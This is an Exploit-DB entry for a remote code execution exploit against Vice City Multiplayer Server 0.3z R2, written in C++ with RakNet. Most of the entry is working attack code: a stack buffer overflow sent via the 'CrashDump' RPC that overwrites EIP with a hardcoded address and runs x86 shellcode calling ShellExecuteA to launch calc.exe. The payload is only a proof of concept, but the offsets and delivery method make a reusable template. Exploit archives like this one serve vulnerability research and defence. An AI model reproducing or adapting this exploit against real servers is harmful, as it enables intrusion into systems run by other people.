Vice City Multiplayer Server 0.3z R2 - Remote Code Execution

EDB-ID:

20758

CVE:


EDB Verified:

Author:

Sasuke78200

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2012-08-23

Vulnerable App: 
/*
Exploit Title: Vice City Multiplayer remote code execution (Server)
Date: 22/08/2012
Exploit Author: Sasuke78200 (Benjaa Toufik)
Software Link:
http://www.vicecitymultiplayer.com/downloads/03z_r2/server0.3zr2(pawn)(win)(updated2).zip
Version: 0.3z R2
Tested on: Windows XP SP3, Windows 7 Ultimate SP1, Windows Server 2003,
Windows Server 2008, it should work on all Windows.

Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/20758.tar.gz
*/

#include "main.h"

/* 
	Written by Sasuke78200
	http://sasuke78200.blogspot.fr/

 */


RakClientInterface* pClientInterface;


void Exploit()
{
	unsigned long iLen;
	unsigned char aBuffer[4096];
	RakNet::BitStream* pBitStream;

	unsigned char aShellCode[] = 
	{
		0xE8, 0x25, 0x00, 0x00, 0x00, 0x5B, 0x81, 0xEC, 
		0x80, 0x00, 0x00, 0x00, 0x6A, 0x01, 0x6A, 0x00,
		0x6A, 0x00, 0x53, 0x68, 0x78, 0x82, 0x44, 0x00, 
		0x6A, 0x00, 0xB8, 0x94, 0x61, 0x44, 0x00, 0xFF, 
		0x10, 0x6A, 0x00, 0xB8, 0x00, 0x61, 0x44, 0x00, 
		0xFF, 0x10, 0xE8, 0xD6, 0xFF, 0xFF, 0xFF, 0x63, 
		0x61, 0x6C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00
/* Compiled version of */
		//USE32
	
		//_start:
		//	call _string

		//_begin:
		//	pop 	ebx
		//	sub 	esp, 0x80

		//	; ShellExecuteA(0, "open", "calc.exe", 0, 0, SW_SHOWNORMAL);
		//	push	1
		//	push	0
		//	push 	0
		//	push	ebx
		//	push	0x448278	; offset of "open" on the server
		//	push	0x00
		//	mov		eax, 0x446194
		//	call	[eax]

		//	; ExitProcess(0); To avoid a crash
		//	push	0
		//	mov		eax, 0x446100
		//	call	[eax]
	
		//_string:
		//	call _begin
		//	db "calc.exe"
		//	db 0
	};

	pBitStream = new RakNet::BitStream();

	memset(aBuffer, 0x49, sizeof(aBuffer));

	iLen = 588; // limit of the stack on Windows

	// New EIP (stack pointer)

	*(unsigned long*)&aBuffer[iLen] = 0x4165E6;		// Windows
	iLen += 4; // EIP
	*(unsigned long*)&aBuffer[iLen] = 0x90909090;
	iLen += 4;
	memcpy(&aBuffer[iLen], aShellCode, sizeof(aShellCode));
	iLen += sizeof(aShellCode);



	pBitStream->Write((unsigned int)iLen);
	pBitStream->Write((char*)aBuffer, iLen);


	pClientInterface->RPC("CrashDump", pBitStream, HIGH_PRIORITY, RELIABLE, 0, false, UNASSIGNED_NETWORK_ID, 0);
	delete pBitStream;
}

int main()
{

	Packet*	pPacket;

	pClientInterface = RakNetworkFactory::GetRakClientInterface();
	pClientInterface->Connect("127.0.0.1", 5192, 0, 0, 20);


	for(;;)
	{
		while((pPacket = pClientInterface->Receive()) != 0)
		{
			switch(pPacket->data[0])
			{
			case ID_CONNECTION_REQUEST_ACCEPTED:
				{
					puts("Connected ...");
					Exploit();
					break;
				}
			case ID_CONNECTION_LOST:
				{
					puts("Connection time out\nCode executed ? :)");
					break;
				}
			case ID_RECEIVED_STATIC_DATA:
				{
					break;
				}
			default:
				{
					printf("packet id %d received lenght %d bytes\n", pPacket->data[0], pPacket->length);
				}
			}

			pClientInterface->DeallocatePacket(pPacket);
		}


	}

	return 0;
}
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services